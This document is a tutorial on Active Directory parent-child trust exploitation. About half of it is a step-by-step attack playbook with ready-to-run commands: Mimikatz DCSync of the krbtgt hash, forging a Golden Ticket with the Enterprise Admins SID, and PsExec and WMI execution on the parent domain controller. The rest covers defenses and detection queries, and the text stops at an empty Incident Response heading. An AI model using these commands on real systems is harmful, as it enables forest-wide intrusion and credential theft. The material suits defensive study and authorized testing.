Parent-Child Domain Trust Exploitation: The Complete Guide

Introduction: Understanding the Threat

Active Directory (AD) is the backbone of enterprise IT infrastructure, managing identities and access for millions of organizations worldwide. Within an AD forest, domains are linked by trust relationships that enable seamless resource sharing and user authentication across domain boundaries. While these trusts are essential for operational efficiency, they represent a significant attack surface when not properly secured.

The parent-child domain trust relationship is particularly critical. These trusts are implicit, bidirectional, and transitive within a forest. A compromised child domain can serve as a launchpad for an attacker to escalate privileges and ultimately seize control of the entire AD forest, including all parent domains and the forest root.

One of the most potent techniques for this escalation is the Golden Ticket attack, which leverages a forged Kerberos Ticket-Granting Ticket (TGT) combined with SID History injection to grant an attacker unrestricted access to parent domain resources. This comprehensive guide provides a detailed methodology for understanding, executing, and defending against this attack.

ℹ️ Key Fact: An attacker with Domain Administrator access in a child domain can achieve Enterprise Admin access in the parent domain in under 15 minutes using the techniques described in this guide.

Attack Overview & Visualization

The Attack at a Glance

Phase | Action                    | Primary Tools                  | Expected Outcome                                  | Time
------|---------------------------|--------------------------------|---------------------------------------------------|---------
1     | Enumerate Domain Trusts   | nltest, PowerView, Get-ADTrust | Confirm bidirectional trust with parent domain    | 5-10 min
2     | Extract Child KRBTGT Hash | Mimikatz DCSync, Rubeus        | Obtain NTLM hash of child domain's krbtgt account | 3-5 min
3     | Enumerate Parent EA SID   | PowerView, Get-ADGroup         | Identify Enterprise Admins SID in parent domain   | 3-5 min
4     | Forge Golden Ticket       | Mimikatz, Rubeus               | Create forged TGT with EA SID in SID History      | 2-4 min
5     | Access Parent Domain      | Mimikatz, PsExec, WMI          | Verify Enterprise Admin access on parent domain   | 2-4 min

Visual Representations

Attack Flowchart - Decision Tree

Figure 1: Attack Flowchart - Step-by-step decision tree showing the attack process from initial compromise to forest compromise

Forest Architecture and Compromise Path

Figure 2: Forest Architecture - Illustrates a typical AD forest with multiple child domains and the attack path from child domain to full forest compromise

Attack Sequence Diagram

Figure 3: Attack Sequence Diagram - Shows the interaction between the attacker and domain controllers throughout the attack

The 5-Phase Attack Flow

Phase 1: Reconnaissance and Trust Enumeration (5-10 minutes)

Objective: Map domain trust relationships and identify the parent domain and forest root.

The first phase involves discovering the trust relationships within the Active Directory forest. This reconnaissance is critical to understanding the attack surface and identifying the parent domain that will be the target of the attack.

Using nltest (Built-in Windows Tool)

# Enumerate trusts for the current domain
nltest /domain_trusts

# Enumerate all trusts in the forest
nltest /domain_trusts /all_trusts

# Get detailed trust information (nltest's verbose switch is /v, not /verbose)
nltest /domain_trusts /all_trusts /v

# Test trust connectivity to a specific domain
nltest /domain_trusts /server:child-dc.child.globalcorp.local

Using PowerView (Advanced Enumeration)

# Import PowerView
. .\PowerView.ps1

# Get all trusts for the current domain
Get-DomainTrust

# Get all trusts within the forest
Get-NetForestTrust

# Get trusts for a specific domain
Get-DomainTrust -Domain globalcorp.local

# Get the SID of the current domain
Get-DomainSID

# Get the SID of a specific domain
Get-DomainSID -Domain globalcorp.local

Using Active Directory PowerShell Module

# Get all trusts for the current domain
Get-ADTrust -Filter *

# Get trusts for a specific domain
Get-ADTrust -Filter * -Server globalcorp.local

# Get detailed trust information. The trust object has no "Transitive" property;
# Direction, IntraForest and DisallowTransivity (Microsoft's spelling) describe it
Get-ADTrust -Filter * | Select-Object Name, Direction, TrustType, IntraForest, DisallowTransivity

✓ Phase 1 Complete When: You have confirmed the existence of a bidirectional trust relationship with the parent domain and identified the parent domain's DNS name.

Phase 2: Child Domain Credential Extraction (3-5 minutes)

Objective: Obtain the NTLM hash of the child domain's krbtgt account, which is the master key for forging Kerberos tickets.

The KRBTGT account is a special service account in Active Directory that is used to encrypt and sign all Kerberos Ticket-Granting Tickets (TGTs) issued by the domain. Obtaining its hash is the critical step that enables golden ticket creation.

Using Mimikatz DCSync

# Start Mimikatz (must be run as Administrator or SYSTEM)
mimikatz.exe

# Enable debug privileges
mimikatz # privilege::debug
Privilege '20' OK

# Perform DCSync to extract the krbtgt hash
mimikatz # lsadump::dcsync /domain:child.globalcorp.local /user:krbtgt

# Expected output:
# [DC] 'child.globalcorp.local' will be the domain
# [DC] 'child-dc.child.globalcorp.local' will be the DC server
# [DC] 'krbtgt' will be the user account
# 
# Credentials:
#   Hash NTLM: 38fb5559b8b79e3657cbf45f7165a0c5

Alternative: Extracting from LSA

# If DCSync is not available, try extracting from LSA on a Domain Controller
mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt

# This will dump all hashes including krbtgt

Using Impacket (Python Alternative)

# Use secretsdump.py from Impacket to extract hashes
python3 secretsdump.py -just-dc-user krbtgt child.globalcorp.local/Administrator:Password123@child-dc.child.globalcorp.local

# Expected output:
# child.globalcorp.local\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:38fb5559b8b79e3657cbf45f7165a0c5:::

✓ Phase 2 Complete When: You have successfully extracted the NTLM hash of the child domain's krbtgt account. The hash is a 32-character hexadecimal string, for example 38fb5559b8b79e3657cbf45f7165a0c5 (the fourth field of the secretsdump output above).

Phase 3: Parent Domain Information Gathering (3-5 minutes)

Objective: Identify the Security Identifier (SID) of the parent domain's "Enterprise Admins" group, which will be injected into the forged ticket.

The Enterprise Admins group is the highest privilege group in an Active Directory forest. By injecting this group's SID into the SID History field of a forged ticket, an attacker can impersonate an Enterprise Admin.

Using PowerView

# Get the SID of the parent domain
Get-DomainSID -Domain globalcorp.local
# Output: S-1-5-21-9876543210-9876543210-9876543210

# Get information about the Enterprise Admins group
Get-NetGroup -Domain globalcorp.local -GroupName "Enterprise Admins"
# Output includes: objectsid = S-1-5-21-9876543210-9876543210-9876543210-519

# Get all members of Enterprise Admins
Get-NetGroupMember -Domain globalcorp.local -GroupName "Enterprise Admins"

Using Active Directory PowerShell Module

# Get the SID of the Enterprise Admins group
(Get-ADGroup -Identity "Enterprise Admins" -Server globalcorp.local).SID.Value
# Output: S-1-5-21-9876543210-9876543210-9876543210-519

# Get members of Enterprise Admins
Get-ADGroupMember -Identity "Enterprise Admins" -Server globalcorp.local

# Get domain information
Get-ADDomain -Identity globalcorp.local

ℹ️ Important: The Enterprise Admins group always has RID 519. So if the parent domain SID is S-1-5-21-9876543210-9876543210-9876543210, the Enterprise Admins SID will be S-1-5-21-9876543210-9876543210-9876543210-519

✓ Phase 3 Complete When: You have identified the full SID of the parent domain's Enterprise Admins group in the format: S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-519

Phase 4: Forging the Golden Ticket (2-4 minutes)

Objective: Create a forged Kerberos TGT with the parent domain's Enterprise Admins SID injected into the SID History attribute.

The golden ticket is a forged Kerberos TGT that is signed with the child domain's KRBTGT hash. By injecting the parent domain's Enterprise Admins SID into the SID History field, the attacker can impersonate an Enterprise Admin when accessing parent domain resources.

Using Mimikatz

# Forge the golden ticket with SID History injection
mimikatz # kerberos::golden /user:Administrator /domain:child.globalcorp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:38fb5559b8b79e3657cbf45f7165a0c5 /sids:S-1-5-21-9876543210-9876543210-9876543210-519 /ptt

# Parameters explained:
# /user: Username to impersonate
# /domain: Child domain name
# /sid: Child domain SID
# /krbtgt: Child domain krbtgt NTLM hash
# /sids: Parent domain Enterprise Admins SID to inject into SID History
# /ptt: Pass-the-Ticket (inject directly into memory)

# Verify the ticket is in memory
mimikatz # kerberos::list

Using Rubeus

# Forge the golden ticket with Rubeus
Rubeus.exe golden /user:Administrator /domain:child.globalcorp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /rc4:38fb5559b8b79e3657cbf45f7165a0c5 /sids:S-1-5-21-9876543210-9876543210-9876543210-519 /ptt

# Verify the ticket
Rubeus.exe triage

Saving the Ticket to a File

# Save with Mimikatz
mimikatz # kerberos::golden /user:Administrator /domain:child.globalcorp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:38fb5559b8b79e3657cbf45f7165a0c5 /sids:S-1-5-21-9876543210-9876543210-9876543210-519 /outfile:golden_ticket.kirbi

# Save with Rubeus
Rubeus.exe golden /user:Administrator /domain:child.globalcorp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /rc4:38fb5559b8b79e3657cbf45f7165a0c5 /sids:S-1-5-21-9876543210-9876543210-9876543210-519 /outfile:golden_ticket.kirbi

✓ Phase 4 Complete When: The golden ticket has been successfully created and injected into memory. You should see the ticket listed when running kerberos::list or Rubeus.exe triage

Phase 5: Accessing the Parent Domain (2-4 minutes)

Objective: Use the forged ticket to access parent domain resources and confirm Enterprise Admin privileges.

With the golden ticket in memory, the attacker can now access any resource in the parent domain as if they were an Enterprise Admin. This is the final step that completes the forest compromise.

Direct Resource Access

# After injecting the golden ticket, access parent domain resources
dir \\globalcorp-dc.globalcorp.local\C$

# List the ADMIN$ share
dir \\globalcorp-dc.globalcorp.local\ADMIN$

# Access the SYSVOL share
dir \\globalcorp-dc.globalcorp.local\SYSVOL

Using PsExec for Remote Code Execution

# Get an interactive shell on the parent domain DC
PsExec.exe \\globalcorp-dc.globalcorp.local cmd.exe

# Execute a command on the parent DC
PsExec.exe \\globalcorp-dc.globalcorp.local whoami

# Copy a file to the parent DC
PsExec.exe \\globalcorp-dc.globalcorp.local copy C:\malware.exe \\globalcorp-dc\C$\Windows\Temp\

Using WMI for Remote Execution

# Execute a command using WMI
wmic /node:globalcorp-dc.globalcorp.local process call create "cmd.exe /c whoami > C:\temp\output.txt"

# Get process information
wmic /node:globalcorp-dc.globalcorp.local process list

# Create a new process
wmic /node:globalcorp-dc.globalcorp.local process call create "powershell.exe -Command Get-Process"

✓ Phase 5 Complete When: You have successfully accessed parent domain resources and confirmed Enterprise Admin privileges. At this point, the entire forest is compromised.

Real-World Scenarios

Scenario 1: The "AcquiredCo" Nightmare

Context: A large, security-conscious corporation, "GlobalCorp," acquires a smaller, more agile startup, "InnovateNow." To integrate the companies, InnovateNow's domain (innovatenow.local) is made a child domain of GlobalCorp's forest root domain (globalcorp.local). InnovateNow has a more relaxed security posture, with developers having local admin rights on their workstations and some servers.

Initial Foothold: An attacker compromises a developer's machine at InnovateNow through a phishing attack, gaining a foothold in the innovatenow.local domain.

Exploitation Path:

  1. Privilege Escalation within Child Domain: The attacker finds that the compromised developer account is a member of a group that has administrative rights on a development server. From this server, the attacker uses Mimikatz to dump credentials from memory and finds the credentials of a Domain Admin for innovatenow.local who had recently logged into the server.
  2. Child Domain Dominance: With Domain Admin privileges in the innovatenow.local domain, the attacker now has the keys to the child kingdom.
  3. Golden Ticket Attack: The attacker uses their DA privileges to perform a DCSync attack and retrieve the krbtgt hash for the innovatenow.local domain.
  4. Parent Domain Reconnaissance: The attacker enumerates the parent domain (globalcorp.local) to find the SID of the "Enterprise Admins" group.
  5. Forest Compromise: A golden ticket is forged using the child domain's krbtgt hash and the parent domain's Enterprise Admins SID. This ticket is then used to access and control resources in the globalcorp.local domain, leading to a full forest compromise.

Impact: The attacker now has complete control over the entire corporate network, including all domains, user accounts, and resources. They can exfiltrate sensitive data, deploy malware, or cause widespread disruption.


Scenario 2: The "BranchOffice" Breach

Context: A multinational corporation, "MegaCorp," has numerous branch offices, each with its own child domain. The london.megacorp.com child domain is managed by a local IT team that is understaffed and has not kept up with the latest security patches on their Domain Controllers.

Initial Foothold: An attacker exploits a known vulnerability, such as Zerologon (CVE-2020-1472), on a Domain Controller in the london.megacorp.com domain. This vulnerability allows for an instant escalation to Domain Admin.

Exploitation Path:

  1. Instant DA: By exploiting Zerologon, the attacker resets the DC's machine account password to a known value, effectively gaining Domain Admin level privileges in the london.megacorp.com domain.
  2. DCSync: With DA on the child DC, the attacker immediately has access to all domain secrets, including the krbtgt hash.
  3. Cross-Domain Attack: The attacker then follows the standard procedure of enumerating the parent domain (megacorp.com), finding the Enterprise Admins SID, and forging a golden ticket to gain control of the entire forest.

Impact: The entire MegaCorp network is compromised in a matter of minutes. The attacker has access to all branch offices, headquarters, and all corporate resources.


Scenario 3: The Insider Threat

Context: A disgruntled system administrator at a subsidiary of a large conglomerate, "WorldWide Inc.", decides to escalate their privileges. The subsidiary has its own child domain, subsidiary.worldwide.inc.

Initial Foothold: The administrator already has Domain Admin privileges within the subsidiary.worldwide.inc domain as part of their job role.

Exploitation Path:

  1. Abuse of Existing Privileges: The administrator, with their legitimate DA access, can directly proceed to the credential extraction phase.
  2. KRBTGT Hash Extraction: The administrator uses their access to a DC in the child domain to run Mimikatz and extract the krbtgt hash.
  3. Golden Ticket to the Kingdom: The administrator forges a golden ticket, adding the Enterprise Admins SID from the parent worldwide.inc domain. They can now operate with the highest level of privilege across the entire corporate network, exfiltrating data or causing disruption.

Impact: An insider threat with legitimate access escalates to full forest compromise, potentially exfiltrating sensitive corporate data or sabotaging critical systems.

Complete Command Reference

Quick Reference Cheat Sheet

# PHASE 1: Enumerate Trusts
nltest /domain_trusts
Get-DomainTrust
Get-ADTrust -Filter *

# PHASE 2: Extract KRBTGT Hash
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:child.local /user:krbtgt

# PHASE 3: Get Parent EA SID
Get-DomainSID -Domain parent.local
Get-NetGroup -Domain parent.local -GroupName "Enterprise Admins"
(Get-ADGroup -Identity "Enterprise Admins" -Server parent.local).SID.Value

# PHASE 4: Forge Golden Ticket
mimikatz # kerberos::golden /user:Administrator /domain:child.local /sid:S-1-5-21-CHILD-SID /krbtgt:HASH /sids:S-1-5-21-PARENT-SID-519 /ptt
Rubeus.exe golden /user:Administrator /domain:child.local /sid:S-1-5-21-CHILD-SID /rc4:HASH /sids:S-1-5-21-PARENT-SID-519 /ptt

# PHASE 5: Access Parent Domain
dir \\parent-dc\C$
PsExec.exe \\parent-dc cmd.exe
wmic /node:parent-dc process call create "cmd.exe"

Troubleshooting Common Issues

Issue 1: "Access Denied" When Running DCSync

Problem: The user running Mimikatz does not have the necessary permissions to perform DCSync.

Solution:

# Ensure you're running as SYSTEM or with DA privileges
whoami /priv

# If not running as SYSTEM, use PsExec to spawn a SYSTEM shell
PsExec.exe -s cmd.exe

# Then run Mimikatz from the SYSTEM shell
C:\Windows\system32> mimikatz.exe

Issue 2: "The specified domain either does not exist or could not be contacted"

Problem: The parent domain is not reachable or the domain name is incorrect.

Solution:

# Verify the domain name
nltest /domain_trusts

# Check DNS resolution
nslookup globalcorp.local

# Ensure network connectivity to the parent domain
ping globalcorp-dc.globalcorp.local

Issue 3: Golden Ticket Not Being Accepted

Problem: The forged ticket is not being accepted by the parent domain.

Causes and Solutions:

  • Incorrect SID: Verify the parent domain SID and Enterprise Admins RID (should be 519)
  • Incorrect KRBTGT hash: Re-extract the krbtgt hash from the child domain
  • Time synchronization: Ensure the attacker's machine clock is synchronized with the domain controllers

# Verify time synchronization
net time \\globalcorp-dc.globalcorp.local

# Resync time if necessary
net time \\globalcorp-dc.globalcorp.local /set

Advanced Attack Vectors

Forged Inter-Realm Trust Tickets

Instead of relying on SID History, an attacker can forge an inter-realm trust ticket. This technique is particularly useful when SID filtering is enabled, as it does not rely on the SID History attribute.

Process:

  1. Extract the Inter-Realm Trust Key: The trust key is shared between the two domains and is used to sign referral tickets. It can be extracted using Mimikatz's lsadump::trust /patch command.
  2. Forge the Trust Ticket: Using the extracted trust key, an attacker can forge a ticket that impersonates a user from the child domain, granting them access to resources in the parent domain.

# Extract the inter-realm trust key
mimikatz # lsadump::trust /patch

# Forge an inter-realm trust ticket
mimikatz # kerberos::golden /user:Administrator /domain:child.local /sid:S-1-5-21-CHILD-SID /krbtgt:TRUST-KEY /sids:S-1-5-21-PARENT-SID-519 /ptt

Exploiting Writable Configuration NC

The Configuration Naming Context (NC) is replicated to every DC in the forest and contains configuration information for the entire forest. If an attacker can gain SYSTEM-level access on a child DC, they may be able to write to the Configuration NC and compromise the entire forest.

Attack Examples:

  • Linking a Malicious GPO: An attacker can link a malicious Group Policy Object (GPO) to a site that contains the parent domain's DCs, allowing them to execute code on those DCs.
  • Compromising gMSA: An attacker can compromise a Group-Managed Service Account (gMSA) that has privileges in the parent domain.
  • Schema Abuse: In rare cases, an attacker with the necessary permissions can modify the AD schema to grant themselves privileges.
  • ADCS Exploitation: If Active Directory Certificate Services (ADCS) is misconfigured, an attacker can create or modify certificate templates to allow for authentication as any user, including Enterprise Admins.

Defensive Countermeasures

Prevention Strategies

1. Implementing SID Filtering

SID filtering is a critical control that prevents the abuse of SID History across domain boundaries. However, it is not enabled by default on intra-forest trusts, which is where this attack is most effective.

# Check current trust settings
Get-ADTrust -Filter * | Select-Object Name, Direction, TrustType, TrustAttributes, SIDFilteringQuarantined

# Enable SID filtering (quarantine) on an external trust. The ActiveDirectory module
# has no Set-ADTrust cmdlet; use netdom from an elevated prompt in the trusting domain
netdom trust globalcorp.local /domain:external.com /quarantine:Yes

# Show the current quarantine state of the trust
netdom trust globalcorp.local /domain:external.com /quarantine

⚠️ Important Note: SID filtering cannot be enabled on intra-forest trusts without breaking functionality. Instead, focus on other preventative measures.
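To make concrete what SID filtering does to the ticket forged in Phase 4, here is an added Python model of the trusting KDC's decision; it is not code from the article's author or from any tool the article names. It uses the article's sample domain SIDs and a constructed PAC group list, and leaves the real PAC encoding and the handling of well-known SIDs outside the model.

```python
# Well-known RID of Enterprise Admins; the group SID is always <forest root domain SID>-519.
RID_ENTERPRISE_ADMINS = 519

# The article's sample domain SIDs (child.globalcorp.local and globalcorp.local).
CHILD_DOMAIN_SID = "S-1-5-21-1234567890-1234567890-1234567890"
PARENT_DOMAIN_SID = "S-1-5-21-9876543210-9876543210-9876543210"


def domain_part(sid: str) -> str:
    """Domain identifier of a domain-relative SID: everything before the final RID."""
    return sid.rsplit("-", 1)[0]


def enterprise_admins_sid(forest_root_sid: str) -> str:
    """Phase 3 of the article: the parent domain SID with RID 519 appended."""
    return f"{forest_root_sid}-{RID_ENTERPRISE_ADMINS}"


def filter_inbound_sids(trusted_domain_sid: str, pac_sids: list, quarantine: bool) -> list:
    """SIDs the trusting domain's KDC keeps from a TGT presented across a trust.

    With SID filtering (quarantine) enabled, every SID whose domain part is not the
    trusted domain's own identifier is stripped, which removes injected SID History.
    Intra-forest parent-child trusts run without quarantine, so everything passes.
    """
    if not quarantine:
        return list(pac_sids)
    return [s for s in pac_sids if domain_part(s) == trusted_domain_sid]


def grants_enterprise_admin(kept_sids: list, forest_root_sid: str) -> bool:
    """True when the SIDs that survived filtering still include the parent EA group."""
    return enterprise_admins_sid(forest_root_sid) in kept_sids


# Constructed PAC group list of the ticket forged in Phase 4: the child domain's
# Administrator (RID 500), its Domain Admins group (RID 512) and the injected parent EA SID.
FORGED_PAC_SIDS = [
    f"{CHILD_DOMAIN_SID}-500",
    f"{CHILD_DOMAIN_SID}-512",
    enterprise_admins_sid(PARENT_DOMAIN_SID),
]


def evaluate(quarantine: bool) -> dict:
    """What the parent KDC ends up with for the forged ticket under each trust setting."""
    kept = filter_inbound_sids(CHILD_DOMAIN_SID, FORGED_PAC_SIDS, quarantine)
    return {"kept": kept, "enterprise_admin": grants_enterprise_admin(kept, PARENT_DOMAIN_SID)}


if __name__ == "__main__":
    print("intra-forest trust (no filtering):", evaluate(False))
    print("quarantined trust (SID filtering):", evaluate(True))
```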

2. Implementing Tiered Administration (ESAE/Red Forest)

The Enhanced Security Admin Environment (ESAE), also known as the "Red Forest" architecture, isolates high-privilege accounts in a separate, hardened forest.

Key Components:

  • Admin Forest: A separate, highly secured forest containing only administrative accounts and resources.
  • Production Forests: User and business resource forests that are segregated from the admin forest.
  • One-way Trust: A one-way trust from the production forest to the admin forest, allowing admins to manage production resources but preventing compromise of the admin forest from a compromised production forest.

3. Regular KRBTGT Password Reset

Resetting the KRBTGT password invalidates all existing Kerberos tickets, including any forged golden tickets.

# Reset the KRBTGT password (must be done twice, in sequence)
# First reset
Set-ADAccountPassword -Identity "krbtgt" -NewPassword (ConvertTo-SecureString -AsPlainText "NewPassword1!" -Force) -Reset

# Wait 10 hours or replicate changes to all DCs

# Second reset (to invalidate any tickets created with the old password)
Set-ADAccountPassword -Identity "krbtgt" -NewPassword (ConvertTo-SecureString -AsPlainText "NewPassword2!" -Force) -Reset

# Verify the change
Get-ADUser -Identity "krbtgt" -Properties PasswordLastSet | Select-Object PasswordLastSet

ℹ️ Best Practice: Reset KRBTGT passwords quarterly or after suspected compromise.
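Why the reset has to be done twice, as an added Python model that is not taken from the article or from Microsoft's tooling: domain controllers honour TGTs sealed with either the current or the previous krbtgt key, so a single reset leaves a ticket forged with the stolen key usable. The key strings are constructed placeholders standing in for real Kerberos keys.

```python
from dataclasses import dataclass, field


@dataclass
class KrbtgtKeyring:
    """The part of a DC's krbtgt handling that matters for the reset procedure:
    the current key plus the previous one, so tickets issued shortly before a
    reset keep working during the overlap. Keys are constructed placeholders."""
    kvno: int = 1
    keys: dict = field(default_factory=lambda: {1: "key-v1-stolen"})

    def reset_password(self, new_key: str) -> None:
        self.kvno += 1
        self.keys[self.kvno] = new_key
        # Only the current and the previous key survive a reset.
        for old in [k for k in self.keys if k < self.kvno - 1]:
            del self.keys[old]

    def accepts_tgt(self, ticket: dict) -> bool:
        """A TGT is usable if it was sealed with the current or the previous key."""
        return self.keys.get(ticket["kvno"]) == ticket["key"]


def forge_golden_ticket(stolen_key: str, kvno: int) -> dict:
    """Phase 4 seen from the DC: a TGT sealed with the key extracted in Phase 2.
    Everything in the ticket other than the sealing key is irrelevant here."""
    return {"kvno": kvno, "key": stolen_key}


def reset_sequence() -> dict:
    """Walk the two-reset procedure and record whether the golden ticket, and a
    legitimate ticket issued between the resets, is still honoured at each step."""
    dc = KrbtgtKeyring()
    golden = forge_golden_ticket("key-v1-stolen", kvno=1)
    result = {"before_reset": dc.accepts_tgt(golden)}

    dc.reset_password("key-v2")                           # first reset
    legit = {"kvno": dc.kvno, "key": dc.keys[dc.kvno]}   # TGT issued normally after reset 1
    result["after_first_reset"] = dc.accepts_tgt(golden)  # still accepted: old key is "previous"

    # Wait for replication and the maximum ticket lifetime, then reset again.
    dc.reset_password("key-v3")                           # second reset
    result["after_second_reset"] = dc.accepts_tgt(golden)
    result["legit_ticket_after_second_reset"] = dc.accepts_tgt(legit)
    return result


if __name__ == "__main__":
    for step, accepted in reset_sequence().items():
        print(f"{step}: {'accepted' if accepted else 'rejected'}")
```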

4. Restricting DCSync Permissions

Limit which accounts can perform DCSync operations.

# Check who has DCSync permissions. The replication rights are ACEs on the domain
# naming context itself, not on user objects, and the ACL identifies them by GUID
$dcsyncGuids = @('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes
                 '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes-All
                 '89e95b76-444d-4c62-991a-0facbeda640c')  # DS-Replication-Get-Changes-In-Filtered-Set
$domainDN = (Get-ADDomain).DistinguishedName
$acl = Get-Acl -Path "AD:\$domainDN"
$acl.Access | Where-Object { $_.ObjectType.ToString() -in $dcsyncGuids } |
    Select-Object IdentityReference, ObjectType, AccessControlType

# Remove DCSync permissions from an account that should not have them
$aces = $acl.Access | Where-Object { $_.ObjectType.ToString() -in $dcsyncGuids -and
                                     $_.IdentityReference -like '*\SuspiciousUser' }
foreach ($ace in $aces) { $null = $acl.RemoveAccessRule($ace) }
Set-Acl -Path "AD:\$domainDN" -AclObject $acl

Detection & Monitoring

Monitoring DCSync Attacks

Event Log Monitoring:

# Monitor for Directory Replication Service (DRS) events
# Event ID 4662: An operation was performed on an object
# Event ID 4624: An account was successfully logged on
# Event ID 4688: A new process has been created

# Search for suspicious DCSync activity. Event 4662 records the control access right
# as a GUID in its Properties field, not by name, so match the GUIDs of
# DS-Replication-Get-Changes (...aa) and DS-Replication-Get-Changes-All (...ad), and
# ignore the domain controllers' own computer accounts, which replicate legitimately.
# 4662 is only written when "Audit Directory Service Access" is enabled and the
# domain object carries a SACL for these rights.
Get-WinEvent -FilterHashtable @{
    LogName = 'Security'
    ID = 4662
    StartTime = (Get-Date).AddDays(-1)
} | Where-Object {
    $_.Message -match '1131f6a[ad]-9c07-11d1-f79f-00c04fc2dcd2' -and
    $_.Message -notmatch 'Account Name:\s+\S+\$'
}

# Look for Mimikatz DCSync commands. Event 4688 carries the command line only when
# "Include command line in process creation events" is enabled by policy
Get-WinEvent -FilterHashtable @{
    LogName = 'Security'
    ID = 4688
    StartTime = (Get-Date).AddDays(-1)
} | Where-Object { $_.Message -match "mimikatz|lsadump" }

Detecting Golden Ticket Usage

Kerberos Ticket Analysis:

# Monitor for tickets with unusual lifetimes
# Golden tickets typically have a 10-year lifetime (the Mimikatz default)

# Event ID 4769: A Kerberos service ticket was requested
# Event ID 4770: A Kerberos service ticket was renewed
# Event ID 4771: Kerberos pre-authentication failed

# Search for suspicious service ticket requests. Event 4769 does not list group
# membership, so a group name such as "Enterprise Admins" never appears in it.
# Flag RC4-HMAC (0x17) tickets instead: forged tickets default to RC4, while
# accounts in a current domain normally receive AES tickets
Get-WinEvent -FilterHashtable @{
    LogName = 'Security'
    ID = 4769
    StartTime = (Get-Date).AddDays(-1)
} | Where-Object { $_.Message -match 'Ticket Encryption Type:\s+0x17' }

# A golden ticket skips the AS exchange, so a 4769 for a client with no matching
# 4768 (TGT request) in the same window is another indicator worth correlating

Behavioral Analysis and Anomaly Detection

Monitor for users from child domains accessing parent domain resources. This is typically unusual and should trigger alerts.

Example Alert: Alert if a user from child.globalcorp.local accesses resources in globalcorp.local
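The three signals this section describes (DCSync by a non-DC account, RC4 service tickets, and child-domain accounts appearing on parent-domain hosts) as detection logic run over constructed event records. This is added example code, not the author's and not any vendor's rule set; the event records are simplified dicts built from the article's sample environment, and the host, domain and account names are assumptions.

```python
import re

# Control access right GUIDs that appear in the Properties field of Event 4662
# when an account replicates directory secrets (DCSync).
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
RC4_HMAC = "0x17"                                   # 4769 Ticket Encryption Type for RC4-HMAC
PARENT_HOSTS = {"globalcorp-dc.globalcorp.local"}   # assumed: parent DCs whose logs we read
CHILD_NETBIOS = {"CHILD"}                           # assumed NetBIOS names of child domains
CHILD_FQDNS = {"child.globalcorp.local"}


def dcsync_by_non_dc(ev):
    """4662 carrying a replication GUID from an account that is not a DC computer
    account (DCs replicate legitimately and their account names end in '$')."""
    if ev["id"] != 4662 or ev["account"].endswith("$"):
        return None
    props = {g.lower() for g in re.findall(r"\{?([0-9a-f-]{36})\}?", ev["properties"], re.I)}
    if props & DCSYNC_GUIDS:
        return ("dcsync_by_non_dc", ev["account"])
    return None


def rc4_service_ticket(ev):
    """4769 service ticket issued with RC4: forged tickets default to RC4 while a
    current domain issues AES, so this narrows the set to review."""
    if ev["id"] == 4769 and ev["encryption"] == RC4_HMAC:
        return ("rc4_service_ticket", ev["account"])
    return None


def child_account_on_parent(ev):
    """4624 on a parent-domain host where the account belongs to a child domain,
    whether the Account Domain is the NetBIOS name or the FQDN (a forged ticket
    carries the domain exactly as it was typed into the forging tool)."""
    if ev["id"] != 4624 or ev["host"] not in PARENT_HOSTS:
        return None
    dom = ev["domain"]
    if dom.upper() in CHILD_NETBIOS or dom.lower() in CHILD_FQDNS:
        return ("child_account_on_parent", f"{dom}\\{ev['account']}")
    return None


RULES = (dcsync_by_non_dc, rc4_service_ticket, child_account_on_parent)


def run_detections(events):
    """Apply every rule to every record; return (rule name, subject) pairs in log order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed records holding only the event fields the rules above read.
SAMPLE_EVENTS = [
    # Normal replication between DCs: no alert
    {"id": 4662, "account": "CHILD-DC$", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account pulling replication changes (the Phase 2 DCSync)
    {"id": 4662, "account": "dev.admin",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # 4662 on an unrelated attribute: no alert
    {"id": 4662, "account": "dev.admin", "properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    # AES service ticket: normal
    {"id": 4769, "account": "jsmith@GLOBALCORP.LOCAL", "encryption": "0x12"},
    # RC4 service ticket for Administrator: review
    {"id": 4769, "account": "Administrator@CHILD.GLOBALCORP.LOCAL", "encryption": RC4_HMAC},
    # Parent-domain user logging on to the parent DC: normal
    {"id": 4624, "host": "globalcorp-dc.globalcorp.local", "domain": "GLOBALCORP", "account": "jsmith"},
    # Child-domain Administrator on the parent DC, domain given as FQDN (the Phase 5 access)
    {"id": 4624, "host": "globalcorp-dc.globalcorp.local", "domain": "child.globalcorp.local",
     "account": "Administrator"},
]

if __name__ == "__main__":
    for rule, subject in run_detections(SAMPLE_EVENTS):
        print(f"ALERT {rule}: {subject}")
```

In production the same three checks run over parsed Security-log exports or a SIEM's normalized fields; the GUID match and the `$` suffix test are the parts most often got wrong when the rule is written against the raw message text.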

Using BloodHound for Proactive Detection

Use BloodHound to identify attack paths and potential vulnerabilities.

# Use BloodHound to identify attack paths
# 1. Collect data using SharpHound
# 2. Import into BloodHound
# 3. Query for "Shortest Path to Domain Admin"
# 4. Look for trust relationships that could be exploited

# Example BloodHound query (Cypher):
MATCH (u:User)-[:MemberOf*1..]->(g:Group)-[:AdminTo]->(c:Computer)-[:MemberOf*1..]->(g2:Group)-[:AdminTo]->(c2:Computer)
WHERE g.name CONTAINS "DOMAIN ADMINS" AND c.domain = "child.globalcorp.local" AND c2.domain = "globalcorp.local"
RETURN u, g, c, g2, c2

Incident Response

